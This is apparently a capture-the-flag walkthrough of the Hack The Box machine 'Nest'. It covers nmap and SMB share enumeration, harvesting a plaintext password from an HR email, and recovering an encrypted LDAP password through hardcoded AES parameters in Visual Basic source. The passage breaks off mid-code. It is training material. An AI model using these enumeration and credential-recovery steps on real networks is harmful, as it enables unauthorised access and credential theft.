Quick Summary
→ This machine is really awesome because it has a lot of enumeration especially on SMBClient
side. you need a strong knowledge of active directory. Rated as easy machine
but other says it is medium box because there is a debugging mode that beginner players have some trouble with it. But unlike other machine’ this one I don’t have a proper shell.
Penetration Testing Methodologies
Network Scanning
→ Nmap scan
→ discover open ports and what services are running
Enumeration
→ Service enumeration
→ Enumeration smb
shares
→ In this phase there was a lot of SMB
Enumeration’ different files has discovered inside
→ Analyzing the retrived content, some interesting at file RU_Config.xml
and config.xml
Post - Exploitation
→ Analyze how the decrypting of password works `
→ Decrypting the password
with `dotnetfiddle
→ running the script will give the password for user
Exploitation
→ Enumeration C.Smith
user
→ Login as C.Smith
with SMB
→ finally got the user.txt
Privilege Escalation
→ I initially came across the Debug Mode Password.txt
→ HQK Reporting Service v1.2
service running on port 4386
→ Enumerate HQK Reporting Service v1.2
with telnet and this will give a lot of informatio
→ get and execute the .exe
file – HqkLdap.exe
will give the Administrator
password
→ Finally get the root.txt
flag but with SMB Client
Network Scanning
Walkthrough
→ I always begin at NMAP to look on the services what is running. I always use
- -sV ⇒ Probe open ports to determine service/version info
- -sC ⇒ equivalent to —script=default
- -A- ⇒ Agressive scan
- -oN ⇒ to save our scan results to a text file
nmap -sV -sC -A 10.10.10.178 -oN nmap-Nest
|
# bash
root in ~/htb/Nest ❯ nmap -sV -sC -A 10.10.10.178 -oN nmap-Nest Starting Nmap 7.80 ( https: Nmap scan report for 10.10.10.178 Host is up (0.21s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 445/tcp open microsoft-ds? Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista:icrosoft:windows_server_2012:r2 Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 Rndows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 o1%), Microsoft Windows Embedded Standard 7 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops 4386/tcp open unknown [snip] | Help: | Reporting Service V1.2 | This service allows users to run queries against databases using the legacy HQK format | AVAILABLE COMMANDS --- | LIST | SETDIR <Directory_Name> | RUNQUERY <Query_ID> | DEBUG <Password> |_ HELP <Command> [snip] Host script results: |_clock-skew: 2m26s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-03-22T00:29:42 |_ start_date: 2020-03-21T23:00:50
TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 223.12 ms 10.10.14.1 2 223.23 ms 10.10.10.178
OS and Service detection performed. Please report any incorrect results at https: Nmap done: 1 IP address (1 host up) scanned in 112.08 seconds
root in ~/htb/Nest took 1m52s ❯
|
Nmap results
So there’s only 2 port open.
- 445 ⇒ which is
SMB Client
- 4386 ⇒ this port is unknow. but in
nmap
results it has a service of HQK Service
Enumeration
Since TCP/445 is open, we can take a look to see what shares are available:
# bash
root in htb/boxes/Nest ❯ smbclient -L \\\\10.10.10.178 Enter WORKGROUP\root's password:
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share Data Disk IPC$ IPC Remote IPC Secure$ Disk Users Disk SMB1 disabled -- no workgroup available
root in htb/boxes/Nest ❯
|
The Data
share seems to be accessible anonymously. We can recursively list the contents of the share with smbclient
so :
# bash
root in htb/boxes/Nest ❯ smbclient \\\\10.10.10.178\\Data Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> recurse on smb: \> ls . D 0 Thu Aug 8 06:53:46 2019 .. D 0 Thu Aug 8 06:53:46 2019 IT D 0 Thu Aug 8 06:58:07 2019 Production D 0 Tue Aug 6 05:53:38 2019 Reports D 0 Tue Aug 6 05:53:44 2019 Shared D 0 Thu Aug 8 03:07:51 2019
\IT NT_STATUS_ACCESS_DENIED listing \IT\*
\Production NT_STATUS_ACCESS_DENIED listing \Production\*
\Reports NT_STATUS_ACCESS_DENIED listing \Reports\*
\Shared . D 0 Thu Aug 8 03:07:51 2019 .. D 0 Thu Aug 8 03:07:51 2019 Maintenance D 0 Thu Aug 8 03:07:32 2019 Templates D 0 Thu Aug 8 03:08:07 2019
\Shared\Maintenance . D 0 Thu Aug 8 03:07:32 2019 .. D 0 Thu Aug 8 03:07:32 2019 Maintenance Alerts.txt A 48 Tue Aug 6 07:01:44 2019
\Shared\Templates . D 0 Thu Aug 8 03:08:07 2019 .. D 0 Thu Aug 8 03:08:07 2019 HR D 0 Thu Aug 8 03:08:01 2019 Marketing D 0 Thu Aug 8 03:08:06 2019
\Shared\Templates\HR . D 0 Thu Aug 8 03:08:01 2019 .. D 0 Thu Aug 8 03:08:01 2019 Welcome Email.txt A 425 Thu Aug 8 06:55:36 2019
\Shared\Templates\Marketing . D 0 Thu Aug 8 03:08:06 2019 .. D 0 Thu Aug 8 03:08:06 2019 smb: \>
smb: \> cd \Shared\Templates\HR smb: \Shared\Templates\HR\> ls . D 0 Thu Aug 8 03:08:01 2019 .. D 0 Thu Aug 8 03:08:01 2019 Welcome Email.txt A 425 Thu Aug 8 06:55:36 2019
10485247 blocks of size 4096. 6543883 blocks available
smb: \Shared\Templates\HR\>
|
To easily listed all the directory i use the command recurse on
, and as you can see’ there was a potential files which is the Maintenance Alerts.txt
and Welcome Email.txt
. I download it with smbclient
:
# bash
smb: \Shared\Templates\HR\> mget "Welcome Email.txt" Get file Welcome Email.txt? y getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec) smb: \Shared\Templates\HR\>
|
Then let’s read the what’s the content of .txt
file :
root in htb/boxes/Nest ❯ cat 'Welcome Email.txt' We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>
You will find your home folder in the following location: \\HTB-NEST\Users\<USERNAME>
If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you.
Username: TempUser Password: welcome2019
Thank you HR root in htb/boxes/Nest ❯
|
Next is the Maintenance Alerts.txt
# bash
Current directory is \Shared\Templates\HR\ smb: \Shared\Templates\HR\> cd / smb: \> cd \Shared\Maintenance smb: \Shared\Maintenance\> ls . D 0 Thu Aug 8 03:07:32 2019 .. D 0 Thu Aug 8 03:07:32 2019 Maintenance Alerts.txt A 48 Tue Aug 6 07:01:44 2019
10485247 blocks of size 4096. 6543883 blocks available smb: \Shared\Maintenance\> mget "Maintenance Alerts.txt" Get file Maintenance Alerts.txt? y getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec) smb: \Shared\Maintenance\>
|
Then read the content :
root in htb/boxes/Nest ❯ cat 'Maintenance Alerts.txt' There is currently no scheduled maintenance work root in htb/boxes/Nest ❯
|
Not much interesting so let’s move another phase.
Enumerating SMB Shares
The Welcome Email.txt
give us credentials of TempUser
. so I’ll try it to smbclient
then let’s see if gives us any further access to the Data
share so :
# bash
root in htb/boxes/Nest ❯ smbclient \\\\10.10.10.178\\Data -U TempUser Enter WORKGROUP\TempUser's password: Try "help" to get a list of possible commands. smb: \> recurse on smb: \> ls . D 0 Thu Aug 8 06:53:46 2019 .. D 0 Thu Aug 8 06:53:46 2019 IT D 0 Thu Aug 8 06:58:07 2019 Production D 0 Tue Aug 6 05:53:38 2019 Reports D 0 Tue Aug 6 05:53:44 2019 Shared D 0 Thu Aug 8 03:07:51 2019
\IT . D 0 Thu Aug 8 06:58:07 2019 .. D 0 Thu Aug 8 06:58:07 2019 Archive D 0 Tue Aug 6 06:33:58 2019 Configs D 0 Thu Aug 8 06:59:34 2019 Installs D 0 Thu Aug 8 06:08:30 2019 Reports D 0 Sun Jan 26 08:09:13 2020 Tools D 0 Tue Aug 6 06:33:43 2019
\Production . D 0 Tue Aug 6 05:53:38 2019 .. D 0 Tue Aug 6 05:53:38 2019
\Reports . D 0 Tue Aug 6 05:53:44 2019 .. D 0 Tue Aug 6 05:53:44 2019
\Shared . D 0 Thu Aug 8 03:07:51 2019 .. D 0 Thu Aug 8 03:07:51 2019 Maintenance D 0 Thu Aug 8 03:07:32 2019 Templates D 0 Thu Aug 8 03:08:07 2019
\IT\Archive . D 0 Tue Aug 6 06:33:58 2019 .. D 0 Tue Aug 6 06:33:58 2019
\IT\Configs . D 0 Thu Aug 8 06:59:34 2019 .. D 0 Thu Aug 8 06:59:34 2019 Adobe D 0 Thu Aug 8 03:20:09 2019 Atlas D 0 Tue Aug 6 19:16:18 2019 DLink D 0 Tue Aug 6 21:25:27 2019 Microsoft D 0 Thu Aug 8 03:23:26 2019 NotepadPlusPlus D 0 Thu Aug 8 03:31:37 2019 RU Scanner D 0 Thu Aug 8 04:01:13 2019 Server Manager D 0 Tue Aug 6 21:25:19 2019
\IT\Installs . D 0 Thu Aug 8 06:08:30 2019 .. D 0 Thu Aug 8 06:08:30 2019
\IT\Reports . D 0 Sun Jan 26 08:09:13 2020 .. D 0 Sun Jan 26 08:09:13 2020
\IT\Tools . D 0 Tue Aug 6 06:33:43 2019 .. D 0 Tue Aug 6 06:33:43 2019
\Shared\Maintenance . D 0 Thu Aug 8 03:07:32 2019 .. D 0 Thu Aug 8 03:07:32 2019 Maintenance Alerts.txt A 48 Tue Aug 6 07:01:44 2019
\Shared\Templates . D 0 Thu Aug 8 03:08:07 2019 .. D 0 Thu Aug 8 03:08:07 2019 HR D 0 Thu Aug 8 03:08:01 2019 Marketing D 0 Thu Aug 8 03:08:06 2019
\IT\Configs\Adobe . D 0 Thu Aug 8 03:20:09 2019 .. D 0 Thu Aug 8 03:20:09 2019 editing.xml AH 246 Sat Aug 3 20:58:42 2019 Options.txt A 0 Tue Oct 11 05:11:14 2011 projects.xml A 258 Wed Jan 9 00:30:52 2013 settings.xml A 1274 Thu Aug 8 03:19:12 2019
\IT\Configs\Atlas . D 0 Tue Aug 6 19:16:18 2019 .. D 0 Tue Aug 6 19:16:18 2019 Temp.XML A 1369 Wed Jun 11 15:38:22 2003
\IT\Configs\DLink . D 0 Tue Aug 6 21:25:27 2019 .. D 0 Tue Aug 6 21:25:27 2019
\IT\Configs\Microsoft . D 0 Thu Aug 8 03:23:26 2019 .. D 0 Thu Aug 8 03:23:26 2019 Options.xml A 4598 Sun Mar 4 03:24:24 2012
\IT\Configs\NotepadPlusPlus . D 0 Thu Aug 8 03:31:37 2019 .. D 0 Thu Aug 8 03:31:37 2019 config.xml A 6451 Thu Aug 8 07:01:25 2019 shortcuts.xml A 2108 Thu Aug 8 03:30:27 2019
\IT\Configs\RU Scanner . D 0 Thu Aug 8 04:01:13 2019 .. D 0 Thu Aug 8 04:01:13 2019 RU_config.xml A 270 Fri Aug 9 03:49:37 2019
\IT\Configs\Server Manager . D 0 Tue Aug 6 21:25:19 2019 .. D 0 Tue Aug 6 21:25:19 2019
\Shared\Templates\HR . D 0 Thu Aug 8 03:08:01 2019 .. D 0 Thu Aug 8 03:08:01 2019 Welcome Email.txt A 425 Thu Aug 8 06:55:36 2019
\Shared\Templates\Marketing . D 0 Thu Aug 8 03:08:06 2019 .. D 0 Thu Aug 8 03:08:06 2019
10485247 blocks of size 4096. 6543883 blocks available smb: \>
|
Looks like we have access to a some files in the IT
directory now. I just recursively pull down all the files in the share so :
root in htb/boxes/Nest ❯ smbget -R smb://10.10.10.178/Data/ -U TempUser Password for [TempUser] connecting to //Data/10.10.10.178: Using workgroup WORKGROUP, user TempUser smb://10.10.10.178/Data//IT/Configs/Adobe/editing.xml smb://10.10.10.178/Data//IT/Configs/Adobe/Options.txt smb://10.10.10.178/Data//IT/Configs/Adobe/projects.xml smb://10.10.10.178/Data//IT/Configs/Adobe/settings.xml smb://10.10.10.178/Data//IT/Configs/Atlas/Temp.XML smb://10.10.10.178/Data//IT/Configs/Microsoft/Options.xml smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/config.xml smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/shortcuts.xml smb://10.10.10.178/Data//IT/Configs/RU Scanner/RU_config.xml smb://10.10.10.178/Data//Shared/Maintenance/Maintenance Alerts.txt smb://10.10.10.178/Data//Shared/Templates/HR/Welcome Email.txt Downloaded 16.65kB in 95 seconds
root in htb/boxes/Nest took 1m34s ❯ ls IT 'Maintenance Alerts.txt' nmap-Nest Production Reports Shared 'Welcome Email.txt'
root in htb/boxes/Nest ❯
|
When I enumerate all the files 1 by 1 on my operating system i found interesting stuff – RU_Config.xml
and config.xml
inside this directory /IT/Configs/RU Scanner/RU_Config.xml
root in htb/boxes/Nest ❯ cd IT/Configs/
root in Nest/IT/Configs ❯ ls Adobe Atlas DLink Microsoft NotepadPlusPlus 'RU Scanner' 'Server Manager'
root in Nest/IT/Configs ❯ cd 'RU Scanner'/
root in IT/Configs/RU Scanner ❯ ls RU_config.xml
root in IT/Configs/RU Scanner ❯
|
and this the content of xml
file I got :
root in IT/Configs/RU Scanner ❯ cat RU_config.xml <?xml version="1.0"?> <ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Port>389</Port> <Username>c.smith</Username> <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password> </ConfigFile> root in IT/Configs/RU Scanner ❯
|
I thought I would use it to try authenticating to the SMB shares
but its Authenticaition failed, So i think the password is encrypted’ leading me to suspect that the password needs to be decrypted.
Next the config.xml
root in IT/Configs/NotepadPlusPlus ❯ cat config.xml <?xml version="1.0" encoding="Windows-1252" ?> <NotepadPlus> <GUIConfigs> <!-- 3 status : "large", "small" or "hide"--> <GUIConfig name="ToolBar" visible="yes">standard</GUIConfig> <!-- 2 status : "show" or "hide"--> <GUIConfig name="StatusBar">show</GUIConfig> <!-- For all attributs, 2 status : "yes" or "no"--> <GUIConfig name="TabBar" dragAndDrop="yes" drawTopBar="yes" drawInactiveTab="yes" reduce="yes" closeButton="no" doubleClick2Close="no" vertical="no" multiLine="no" hide="no" /> <!-- 2 positions : "horizontal" or "vertical"--> <GUIConfig name="ScintillaViewsSplitter">vertical</GUIConfig> <!-- For the attribut of position, 2 status : docked or undocked ; 2 status : "show" or "hide" --> <GUIConfig name="UserDefineDlg" position="undocked">hide</GUIConfig> <GUIConfig name="TabSetting" size="4" replaceBySpace="no" /> <!--App position--> <GUIConfig name="AppPosition" x="662" y="95" width="955" height="659" isMaximized="yes" /> <!-- For the primary scintilla view, 2 status for Attribut lineNumberMargin, bookMarkMargin, indentGuideLine and currentLineHilitingShow: "show" or "hide" 4 status for Attribut folderMarkStyle : "simple", "arrow", "circle" and "box" --> <GUIConfig name="ScintillaPrimaryView" lineNumberMargin="show" bookMarkMargin="show" folderMarkStyle="box" indentGuideLine="show" currentLineHilitingShow="show" Wrap="yes" edge="no" edgeNbColumn="100" wrapSymbolShow="hide" zoom="0" whiteSpaceShow="hide" eolShow="hide" lineWrapMethod="aligned" zoom2="0" /> <!-- For the secodary scintilla view, 2 status for Attribut lineNumberMargin, bookMarkMargin, indentGuideLine and currentLineHilitingShow: "show" or "hide" 4 status for Attribut folderMarkStyle : "simple", "arrow", "circle" and "box" --> <GUIConfig name="Auto-detection">yes</GUIConfig> <GUIConfig name="CheckHistoryFiles">no</GUIConfig> <GUIConfig name="TrayIcon">no</GUIConfig> <GUIConfig name="RememberLastSession">yes</GUIConfig> <!-- New Document default settings : format = 0/1/2 -> win/unix/mac encoding = 0/1/2/3/4/5 -> ANSI/UCS2Big/UCS2small/UTF8/UTF8-BOM defaultLang = 0/1/2/..
Note 1 : UTF8-BOM -> UTF8 without BOM Note 2 : for defaultLang : 0 -> L_TXT 1 -> L_PHP ... (see source file) --> <GUIConfig name="NewDocDefaultSettings" format="0" encoding="0" lang="0" codepage="-1" openAnsiAsUTF8="no" /> <GUIConfig name="langsExcluded" gr0="0" gr1="0" gr2="0" gr3="0" gr4="0" gr5="0" gr6="0" gr7="0" langMenuCompact="yes" /> <!-- printOption is print colour setting, the following values are possible : 0 : WYSIWYG 1 : Invert colour 2 : B & W 3 : WYSIWYG but without background colour --> <GUIConfig name="Print" lineNumber="no" printOption="0" headerLeft="$(FULL_CURRENT_PATH)" headerMiddle="" headerRight="$(LONG_DATE) $(TIME)" headerFontName="IBMPC" headerFontStyle="1" headerFontSize="8" footerLeft="" footerMiddle="-$(CURRENT_PRINTING_PAGE)-" footerRight="" footerFontName="" footerFontStyle="0" footerFontSize="9" margeLeft="0" margeTop="0" margeRight="0" margeBottom="0" /> <!-- Backup Setting : 0 : non backup 1 : simple backup 2 : verbose backup --> <GUIConfig name="Backup" action="0" useCustumDir="no" dir="" /> <GUIConfig name="TaskList">yes</GUIConfig> <GUIConfig name="SaveOpenFileInSameDir">no</GUIConfig> <GUIConfig name="noUpdate" intervalDays="15" nextUpdateDate="20080426">no</GUIConfig> <GUIConfig name="MaitainIndent">yes</GUIConfig> <GUIConfig name="MRU">yes</GUIConfig> <GUIConfig name="URL">0</GUIConfig> <GUIConfig name="globalOverride" fg="no" bg="no" font="no" fontSize="no" bold="no" italic="no" underline="no" /> <GUIConfig name="auto-completion" autoCAction="0" triggerFromNbChar="1" funcParams="no" /> <GUIConfig name="sessionExt"></GUIConfig> <GUIConfig name="SmartHighLight">yes</GUIConfig> <GUIConfig name="TagsMatchHighLight" TagAttrHighLight="yes" HighLightNonHtmlZone="no">yes</GUIConfig> <GUIConfig name="MenuBar">show</GUIConfig> <GUIConfig name="Caret" width="1" blinkRate="250" /> <GUIConfig name="ScintillaGlobalSettings" enableMultiSelection="no" /> <GUIConfig name="openSaveDir" value="0" defaultDirPath="" /> <GUIConfig name="titleBar" short="no" /> <GUIConfig name="DockingManager" leftWidth="200" rightWidth="200" topHeight="200" bottomHeight="266"> <FloatingWindow cont="4" x="39" y="109" width="531" height="364" /> <PluginDlg pluginName="dummy" id="0" curr="3" prev="-1" isVisible="yes" /> <PluginDlg pluginName="NppConverter.dll" id="3" curr="4" prev="0" isVisible="no" /> <ActiveTabs cont="0" activeTab="-1" /> <ActiveTabs cont="1" activeTab="-1" /> <ActiveTabs cont="2" activeTab="-1" /> <ActiveTabs cont="3" activeTab="-1" /> </GUIConfig> </GUIConfigs> <!-- The History of opened files list --> <FindHistory nbMaxFindHistoryPath="10" nbMaxFindHistoryFilter="10" nbMaxFindHistoryFind="10" nbMaxFindHistoryReplace="10" matchWord="no" matchCase="no" wrap="yes" directionDown="yes" fifRecuisive="yes" fifInHiddenFolder="no" dlgAlwaysVisible="no" fifFilterFollowsDoc="no" fifFolderFollowsDoc="no" searchMode="0" transparencyMode="0" transparency="150"> <Find name="text" /> <Find name="txt" /> <Find name="itx" /> <Find name="iTe" /> <Find name="IEND" /> <Find name="redeem" /> <Find name="activa" /> <Find name="activate" /> <Find name="redeem on" /> <Find name="192" /> <Replace name="C_addEvent" /> </FindHistory> <History nbMaxFile="15" inSubMenu="no" customLength="-1"> <File filename="C:\windows\System32\drivers\etc\hosts" /> <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" /> <File filename="C:\Users\C.Smith\Desktop\todo.txt" /> </History> </NotepadPlus>
root in IT/Configs/NotepadPlusPlus ❯
|
Looking at the very bottom of config.xml
I see another interesting stuff. Someone was accessing files on the Secure$
share as well as files on the C.Smith
user’s desktop.
<History nbMaxFile="15" inSubMenu="no" customLength="-1"> <File filename="C:\windows\System32\drivers\etc\hosts" /> <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" /> <File filename="C:\Users\C.Smith\Desktop\todo.txt" /> </History>
|
Post Exploitation
Enumerate TempUser
so let’s see if we can access anything in this share as TempUser
:
# bash
❯ smbclient \\\\10.10.10.178\\Secure$ -U TempUser smb: \> recurse on smb: \> ls . D 0 Wed Aug 7 19:08:12 2019 .. D 0 Wed Aug 7 19:08:12 2019 Finance D 0 Wed Aug 7 15:40:13 2019 HR D 0 Wed Aug 7 19:08:11 2019 IT D 0 Thu Aug 8 06:59:25 2019 \Finance NT_STATUS_ACCESS_DENIED listing \Finance\* \HR NT_STATUS_ACCESS_DENIED listing \HR\* \IT NT_STATUS_ACCESS_DENIED listing \IT\*
smb: \>
|
Interesting; it seems that the TempUser doesn’t have any access to listing the 3 directories. but ultimately I found that the IT\Carl\ folder was indeed listable:
root in htb/boxes/Nest ❯ smbclient \\\\10.10.10.178\\Secure$ -U TempUser Enter WORKGROUP\TempUser's password: Try "help" to get a list of possible commands. smb: \> cd IT/Carl smb: \IT\Carl\> recurse on smb: \IT\Carl\> ls . D 0 Thu Aug 8 03:42:14 2019 .. D 0 Thu Aug 8 03:42:14 2019 Docs D 0 Thu Aug 8 03:44:00 2019 Reports D 0 Tue Aug 6 21:45:40 2019 VB Projects D 0 Tue Aug 6 22:41:55 2019
\IT\Carl\Docs . D 0 Thu Aug 8 03:44:00 2019 .. D 0 Thu Aug 8 03:44:00 2019 ip.txt A 56 Thu Aug 8 03:44:16 2019 mmc.txt A 73 Thu Aug 8 03:43:42 2019
\IT\Carl\Reports . D 0 Tue Aug 6 21:45:40 2019 .. D 0 Tue Aug 6 21:45:40 2019
\IT\Carl\VB Projects . D 0 Tue Aug 6 22:41:55 2019 .. D 0 Tue Aug 6 22:41:55 2019 Production D 0 Tue Aug 6 22:07:13 2019 WIP D 0 Tue Aug 6 22:47:41 2019
\IT\Carl\VB Projects\Production . D 0 Tue Aug 6 22:07:13 2019 .. D 0 Tue Aug 6 22:07:13 2019
\IT\Carl\VB Projects\WIP . D 0 Tue Aug 6 22:47:41 2019 .. D 0 Tue Aug 6 22:47:41 2019 RU D 0 Fri Aug 9 23:36:45 2019
\IT\Carl\VB Projects\WIP\RU . D 0 Fri Aug 9 23:36:45 2019 .. D 0 Fri Aug 9 23:36:45 2019 RUScanner D 0 Thu Aug 8 06:05:54 2019 RUScanner.sln A 871 Tue Aug 6 22:45:36 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner . D 0 Thu Aug 8 06:05:54 2019 .. D 0 Thu Aug 8 06:05:54 2019 bin D 0 Thu Aug 8 04:00:11 2019 ConfigFile.vb A 772 Thu Aug 8 06:05:09 2019 Module1.vb A 279 Thu Aug 8 06:05:44 2019 My Project D 0 Thu Aug 8 04:00:11 2019 obj D 0 Thu Aug 8 04:00:11 2019 RU Scanner.vbproj A 4828 Fri Aug 9 23:37:51 2019 RU Scanner.vbproj.user A 143 Tue Aug 6 20:55:27 2019 SsoIntegration.vb A 133 Thu Aug 8 06:05:58 2019 Utils.vb A 4888 Thu Aug 8 03:49:35 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner\bin . D 0 Thu Aug 8 04:00:11 2019 .. D 0 Thu Aug 8 04:00:11 2019 Debug D 0 Thu Aug 8 03:59:13 2019 Release D 0 Tue Aug 6 20:55:26 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner\My Project . D 0 Thu Aug 8 04:00:11 2019 .. D 0 Thu Aug 8 04:00:11 2019 Application.Designer.vb A 441 Tue Aug 6 20:55:13 2019 Application.myapp A 481 Tue Aug 6 20:55:13 2019 AssemblyInfo.vb A 1163 Tue Aug 6 20:55:13 2019 Resources.Designer.vb A 2776 Tue Aug 6 20:55:13 2019 Resources.resx A 5612 Tue Aug 6 20:55:13 2019 Settings.Designer.vb A 2989 Tue Aug 6 20:55:13 2019 Settings.settings A 279 Tue Aug 6 20:55:13 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner\obj . D 0 Thu Aug 8 04:00:11 2019 .. D 0 Thu Aug 8 04:00:11 2019 x86 D 0 Thu Aug 8 03:59:18 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Debug . D 0 Thu Aug 8 03:59:13 2019 .. D 0 Thu Aug 8 03:59:13 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Release . D 0 Tue Aug 6 20:55:26 2019 .. D 0 Tue Aug 6 20:55:26 2019
\IT\Carl\VB Projects\WIP\RU\RUScanner\obj\x86 . D 0 Thu Aug 8 03:59:18 2019 .. D 0 Thu Aug 8 03:59:18 2019
10485247 blocks of size 4096. 6544137 blocks available smb: \IT\Carl\>
|
Looks like there is some source code written in Visual Basic
. SO I use smbget
to recursively download the Secure$\IT\Carl
directory for further analysis so :
root in htb/boxes/Nest ❯ smbget -rR smb://10.10.10.178/Secure$/IT/Carl/ -U TempUser Password for [TempUser] connecting to //Secure$/10.10.10.178: Using workgroup WORKGROUP, user TempUser smb://10.10.10.178/Secure$/IT/Carl//Docs/ip.txt smb://10.10.10.178/Secure$/IT/Carl//Docs/mmc.txt smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/ConfigFile.vb smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Module1.vb smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.myapp smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.resx smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.settings smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/SsoIntegration.vb smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Utils.vb smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner.sln Downloaded 0b in 12 seconds
root in htb/boxes/Nest 12s ❯
|
So this is the whole directory I get :
root in WIP/RU/RUScanner ❯ ls bin ConfigFile.vb Module1.vb 'My Project' obj 'RU Scanner.vbproj' 'RU Scanner.vbproj.user' SsoIntegration.vb Utils.vb
root in WIP/RU/RUScanner ❯
|
Looking at the .vb
file the Module1.vb
was responsible for retrieving the password from RU_config.xml
:
root in WIP/RU/RUScanner ❯ cat Module1.vb Module Module1
Sub Main() Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml") Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}
End Sub
End Module
root in WIP/RU/RUScanner ❯
|
And the Utils.vb
are responsible for decrypting the password :
root in WIP/RU/RUScanner ❯ cat Utils.vb Imports System.Text Imports System.Security.Cryptography Public Class Utils
Public Shared Function GetLogFilePath() As String Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt") End Function
Public Shared Function DecryptString(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty Else Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function
Public Shared Function EncryptString(PlainString As String) As String If String.IsNullOrEmpty(PlainString) Then Return String.Empty Else Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function
Public Shared Function Encrypt(ByVal plainText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String
Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector) Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue) Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText) Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations) Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8)) Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes) Using memoryStream As New IO.MemoryStream() Using cryptoStream As New CryptoStream(memoryStream, _ encryptor, _ CryptoStreamMode.Write) cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length) cryptoStream.FlushFinalBlock() Dim cipherTextBytes As Byte() = memoryStream.ToArray() memoryStream.Close() cryptoStream.Close() Return Convert.ToBase64String(cipherTextBytes) End Using End Using End Function
Public Shared Function Decrypt(ByVal cipherText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String
Dim initVectorBytes As Byte() initVectorBytes = Encoding.ASCII.GetBytes(initVector)
Dim saltValueBytes As Byte() saltValueBytes = Encoding.ASCII.GetBytes(saltValue)
Dim cipherTextBytes As Byte() cipherTextBytes = Convert.FromBase64String(cipherText)
Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations)
Dim keyBytes As Byte() keyBytes = password.GetBytes(CInt(keySize / 8))
Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC
